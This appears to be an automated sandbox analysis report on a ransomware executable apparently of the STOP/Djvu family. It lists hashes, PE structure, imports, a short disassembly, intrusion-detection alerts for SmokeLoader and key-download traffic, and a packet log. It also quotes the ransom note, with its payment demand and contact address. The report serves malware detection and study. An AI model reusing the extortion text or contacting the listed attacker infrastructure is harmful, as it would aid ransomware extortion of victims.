                                                                                                  SHA-512:BAF10AF4BB7298A64982EFFC8121D97B480BBD6FFB28383C68A249A56F3334A54BD25290579BCFC1993B4EFE9915A132E8C4C1A2BAC77BA6CFEE6561AA3BAA88
                                                                                                  Malicious:true
                                                                                                  Reputation:unknown
                                                                                                  Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-vKvLYNOV9o..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshmail.top....Reserve e-mail address
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):6.695096687339289
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:file.exe
                                                                                                  File size:223232
                                                                                                  MD5:31fff2eafadae81a6ae1e8580966baba
                                                                                                  SHA1:c8f1d3962ba2f8e60ac6aa30cecb553f59374608
                                                                                                  SHA256:2147a7d3a63e11d94b02fba0c83799574cdca50c7384f2e72b825e9aecf92916
                                                                                                  SHA512:e20bbe36d77ea2b3112f76dcc21d109786fc805fe26cabdd9399d1d805a73774e6931031af03c7fb389c6dc59f977600efeba73568b7547f864e5c5ff601879e
                                                                                                  SSDEEP:3072:oyxsEF8k3Sb5VezE7JLm4dRFGmccGi3mJuBreaxp:NsE2k3K50EVJVGmccou3
                                                                                                  TLSH:A4249D1362E17C71E5260B728E6EC6E83B9DF5904F2877AB12288A6F0DB01B3D573754
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ZJ..;$..;$..;$.eu...;$..M...;$..M...;$..M...;$..C...;$..;%..;$..M...;$..M...;$..M...;$.Rich.;$.........................PE..L..
                                                                                                  Icon Hash:8f2d302414221902
                                                                                                  Entrypoint:0x40540f
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x632F0AE9 [Sat Sep 24 13:49:29 2022 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:1
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:1
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:1
                                                                                                  Import Hash:7e2f40dcf3d81681fb786c02378f9f78
                                                                                                  Instruction
                                                                                                  call 00007FFA6477C9C2h
                                                                                                  jmp 00007FFA6477940Eh
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  sub esp, 20h
                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  push 00000008h
                                                                                                  pop ecx
                                                                                                  mov esi, 004012ECh
                                                                                                  lea edi, dword ptr [ebp-20h]
                                                                                                  rep movsd
                                                                                                  mov dword ptr [ebp-08h], eax
                                                                                                  mov eax, dword ptr [ebp+0Ch]
                                                                                                  pop edi
                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                  pop esi
                                                                                                  test eax, eax
                                                                                                  je 00007FFA6477958Eh
                                                                                                  test byte ptr [eax], 00000008h
                                                                                                  je 00007FFA64779589h
                                                                                                  mov dword ptr [ebp-0Ch], 01994000h
                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                  push eax
                                                                                                  push dword ptr [ebp-10h]
                                                                                                  push dword ptr [ebp-1Ch]
                                                                                                  push dword ptr [ebp-20h]
                                                                                                  call dword ptr [004010FCh]
                                                                                                  leave
                                                                                                  retn 0008h
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  mov edx, dword ptr [ebp+08h]
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  test edx, edx
                                                                                                  je 00007FFA64779589h
                                                                                                  mov edi, dword ptr [ebp+0Ch]
                                                                                                  test edi, edi
                                                                                                  jne 00007FFA64779595h
                                                                                                  call 00007FFA64779C34h
                                                                                                  push 00000016h
                                                                                                  pop esi
                                                                                                  mov dword ptr [eax], esi
                                                                                                  call 00007FFA6477ADC8h
                                                                                                  mov eax, esi
                                                                                                  jmp 00007FFA647795B5h
                                                                                                  mov eax, dword ptr [ebp+10h]
                                                                                                  test eax, eax
                                                                                                  jne 00007FFA64779586h
                                                                                                  mov byte ptr [edx], al
                                                                                                  jmp 00007FFA64779564h
                                                                                                  mov esi, edx
                                                                                                  sub esi, eax
                                                                                                  mov cl, byte ptr [eax]
                                                                                                  mov byte ptr [esi+eax], cl
                                                                                                  inc eax
                                                                                                  test cl, cl
                                                                                                  je 00007FFA64779585h
                                                                                                  dec edi
                                                                                                  jne 00007FFA64779575h
                                                                                                  test edi, edi
                                                                                                  jne 00007FFA64779593h
                                                                                                  mov byte ptr [edx], 00000000h
                                                                                                  call 00007FFA64779BFEh
                                                                                                  push 00000022h
                                                                                                  pop ecx
                                                                                                  mov dword ptr [eax], ecx
                                                                                                  mov esi, ecx
                                                                                                  jmp 00007FFA64779548h
                                                                                                  xor eax, eax
                                                                                                  pop edi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push ebx
                                                                                                  mov ebx, dword ptr [ebp+08h]
                                                                                                  cmp ebx, FFFFFFE0h
                                                                                                  jnbe 00007FFA647795F1h
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  cmp dword ptr [00000030h], 00000000h
                                                                                                  Programming Language:
                                                                                                  • [ASM] VS2010 build 30319
                                                                                                  • [ C ] VS2010 build 30319
                                                                                                  • [C++] VS2010 build 30319
                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                  • [RES] VS2010 build 30319
                                                                                                  • [LNK] VS2010 build 30319
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x143740x28.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x172a0000xe088.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x36480x40.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d0.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x13e100x14000False0.48118896484375data5.864101883014939IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .data0x150000x17131180x13e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .xafumih0x17290000x2440x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0x172a0000xe0880xe200False0.41226493362831856data4.632040393253983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  AFX_DIALOG_LAYOUT0x17377100x2data5.0
                                                                                                  HILEFELUROPIFEKUNIDADIRIL0x17341080x196bASCII text, with very long lines (6507), with no line terminatorsTamilIndia0.5881358536960196
                                                                                                  HILEFELUROPIFEKUNIDADIRIL0x17341080x196bASCII text, with very long lines (6507), with no line terminatorsTamilSri Lanka0.5881358536960196
                                                                                                  TORALIVODAFAWIZIHI0x17369700xd0bASCII text, with very long lines (3339), with no line terminatorsTamilIndia0.5974842767295597
                                                                                                  TORALIVODAFAWIZIHI0x17369700xd0bASCII text, with very long lines (3339), with no line terminatorsTamilSri Lanka0.5974842767295597
                                                                                                  ZOPARESO0x1735a780xef4ASCII text, with very long lines (3828), with no line terminatorsTamilIndia0.6000522466039707
                                                                                                  ZOPARESO0x1735a780xef4ASCII text, with very long lines (3828), with no line terminatorsTamilSri Lanka0.6000522466039707
                                                                                                  RT_CURSOR0x17377180x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7598684210526315
                                                                                                  RT_ICON0x172a6900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.4009216589861751
                                                                                                  RT_ICON0x172a6900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.4009216589861751
                                                                                                  RT_ICON0x172ad580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.39739884393063585
                                                                                                  RT_ICON0x172ad580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.39739884393063585
                                                                                                  RT_ICON0x172b2c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2767354596622889
                                                                                                  RT_ICON0x172b2c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2767354596622889
                                                                                                  RT_ICON0x172c3680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3448581560283688
                                                                                                  RT_ICON0x172c3680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3448581560283688
                                                                                                  RT_ICON0x172c8100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.40884476534296027
                                                                                                  RT_ICON0x172c8100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.40884476534296027
                                                                                                  RT_ICON0x172d0b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.47795497185741087
                                                                                                  RT_ICON0x172d0b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.47795497185741087
                                                                                                  RT_ICON0x172e1880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.27745202558635396
                                                                                                  RT_ICON0x172e1880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.27745202558635396
                                                                                                  RT_ICON0x172f0300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.3922811059907834
                                                                                                  RT_ICON0x172f0300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.3922811059907834
                                                                                                  RT_ICON0x172f6f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4067919075144509
                                                                                                  RT_ICON0x172f6f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4067919075144509
                                                                                                  RT_ICON0x172fc600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.22188796680497924
                                                                                                  RT_ICON0x172fc600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.22188796680497924
                                                                                                  RT_ICON0x17322080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.28236397748592873
                                                                                                  RT_ICON0x17322080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.28236397748592873
                                                                                                  RT_ICON0x17332b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.3028688524590164
                                                                                                  RT_ICON0x17332b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.3028688524590164
                                                                                                  RT_ICON0x1733c380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.34574468085106386
                                                                                                  RT_ICON0x1733c380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.34574468085106386
                                                                                                  RT_STRING0x1737af80x3b8dataTamilIndia0.4632352941176471
                                                                                                  RT_STRING0x1737af80x3b8dataTamilSri Lanka0.4632352941176471
                                                                                                  RT_STRING0x1737eb00x1d4dataTamilIndia0.5128205128205128
                                                                                                  RT_STRING0x1737eb00x1d4dataTamilSri Lanka0.5128205128205128
                                                                                                  RT_ACCELERATOR0x17376800x90dataTamilIndia0.6944444444444444
                                                                                                  RT_ACCELERATOR0x17376800x90dataTamilSri Lanka0.6944444444444444
                                                                                                  RT_GROUP_CURSOR0x17378480x14data1.15
                                                                                                  RT_GROUP_ICON0x172e1600x22dataTamilIndia1.0294117647058822
                                                                                                  RT_GROUP_ICON0x172e1600x22dataTamilSri Lanka1.0294117647058822
                                                                                                  RT_GROUP_ICON0x172c7d00x3edataTamilIndia0.8387096774193549
                                                                                                  RT_GROUP_ICON0x172c7d00x3edataTamilSri Lanka0.8387096774193549
                                                                                                  RT_GROUP_ICON0x17340a00x68dataTamilIndia0.7211538461538461
                                                                                                  RT_GROUP_ICON0x17340a00x68dataTamilSri Lanka0.7211538461538461
                                                                                                  RT_VERSION0x17378600x294OpenPGP Secret Key0.5393939393939394
                                                                                                  DLLImport
                                                                                                  KERNEL32.dllGetCommandLineW, SetPriorityClass, GetConsoleAliasExesLengthA, InterlockedIncrement, InterlockedDecrement, GlobalSize, FreeEnvironmentStringsA, GetTickCount, GetCurrentThread, FindNextVolumeMountPointA, GetWindowsDirectoryA, WaitNamedPipeW, EnumTimeFormatsA, GlobalAlloc, GetSystemDirectoryW, SetFileShortNameW, GetPrivateProfileStructW, GetSystemPowerStatus, GetCalendarInfoW, FreeConsole, GetFileAttributesA, TerminateProcess, GetVolumePathNameA, FindNextVolumeMountPointW, GetShortPathNameA, GetCPInfoExW, GetLastError, GetCurrentDirectoryW, GetProcAddress, BeginUpdateResourceW, MoveFileW, SetComputerNameA, EnterCriticalSection, SearchPathA, SetFileAttributesA, GetTempFileNameA, LoadLibraryA, OpenThread, WriteConsoleA, InterlockedExchangeAdd, OpenWaitableTimerW, SetCalendarInfoW, MoveFileA, GetNumberFormatW, SetFileApisToANSI, AddAtomA, OpenJobObjectW, FindNextFileA, GetModuleHandleA, CreateMailslotA, CompareStringA, GetShortPathNameW, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetCurrentProcessId, OpenFileMappingA, EnumCalendarInfoExA, EnumSystemLocalesW, DeleteFileA, MultiByteToWideChar, GetCommandLineA, HeapSetInformation, GetStartupInfoW, RaiseException, HeapAlloc, HeapFree, IsProcessorFeaturePresent, EncodePointer, DecodePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCurrentProcess, LeaveCriticalSection, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, CloseHandle, ExitProcess, WriteFile, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetSystemTimeAsFileTime, LCMapStringW, GetStringTypeW, Sleep, SetFilePointer, GetConsoleCP, GetConsoleMode, RtlUnwind, SetStdHandle, FlushFileBuffers, HeapSize, LoadLibraryW, HeapReAlloc, WriteConsoleW, CreateFileW
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  TamilIndia
                                                                                                  TamilSri Lanka
                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  192.168.2.48.8.8.859683532045695 06/21/23-20:23:37.228239UDP2045695ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)5968353192.168.2.48.8.8.8
                                                                                                  192.168.2.48.8.8.861007532045695 06/21/23-20:23:42.634507UDP2045695ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)6100753192.168.2.48.8.8.8
                                                                                                  192.168.2.48.8.8.859446532045695 06/21/23-20:23:55.526201UDP2045695ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)5944653192.168.2.48.8.8.8
                                                                                                  181.63.252.68192.168.2.480497062036335 06/21/23-20:23:57.751035TCP2036335ET TROJAN Win32/Filecoder.STOP Variant Public Key Download8049706181.63.252.68192.168.2.4
                                                                                                  192.168.2.4190.229.19.749707802036333 06/21/23-20:23:57.425612TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4970780192.168.2.4190.229.19.7
                                                                                                  192.168.2.4190.229.19.749707802020826 06/21/23-20:23:57.425612TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4970780192.168.2.4190.229.19.7
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jun 21, 2023 20:23:37.271353960 CEST4969280192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:23:37.288252115 CEST8049692188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:37.288383961 CEST4969280192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:23:37.288666010 CEST4969280192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:23:37.288712025 CEST4969280192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:23:37.305413961 CEST8049692188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:37.305439949 CEST8049692188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:37.419188023 CEST8049692188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:37.419225931 CEST8049692188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:37.419397116 CEST4969280192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:23:37.432764053 CEST4969280192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:23:37.432811022 CEST4969280192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:23:37.449924946 CEST8049692188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:37.449958086 CEST8049692188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:37.525197029 CEST8049692188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:37.525229931 CEST8049692188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:37.526684046 CEST4969280192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:23:37.987243891 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:38.244142056 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:38.247910976 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:38.248147011 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:38.700916052 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.059593916 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.059644938 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.059770107 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.313335896 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.313369989 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.313389063 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.313414097 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.313432932 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.313508987 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.567009926 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.567069054 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.567116022 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.567162037 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.567209005 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.567208052 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.567255974 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.567274094 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.567305088 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.567331076 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.567353010 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.567446947 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.820763111 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.820822954 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.820869923 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.820915937 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.820928097 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.820964098 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.821008921 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.821029902 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.821074963 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.821095943 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.821122885 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.821167946 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.821171999 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.821212053 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.821264982 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.821264982 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.821331024 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.821388006 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:39.821397066 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.821434975 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:39.821486950 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.075331926 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075390100 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075443029 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075475931 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075508118 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075540066 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075551033 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.075575113 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075608015 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075638056 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.075639963 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075674057 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075697899 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.075706959 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075738907 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075769901 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075795889 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.075803995 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075836897 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075862885 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.075870037 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075905085 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075939894 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.075958014 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.075958014 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.075972080 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.076004028 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.076035023 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.076039076 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.076066017 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.076097012 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.076128006 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.076141119 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.076160908 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.076188087 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.076188087 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.076220036 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.076239109 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.076275110 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.076296091 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.076323032 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.076370001 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.126770020 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.329839945 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.329910994 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.329958916 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.329993010 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.330008030 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330076933 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330084085 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.330131054 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330178022 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330194950 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.330224991 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330270052 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330302000 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.330322981 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330375910 CEST8049695211.168.53.110192.168.2.4
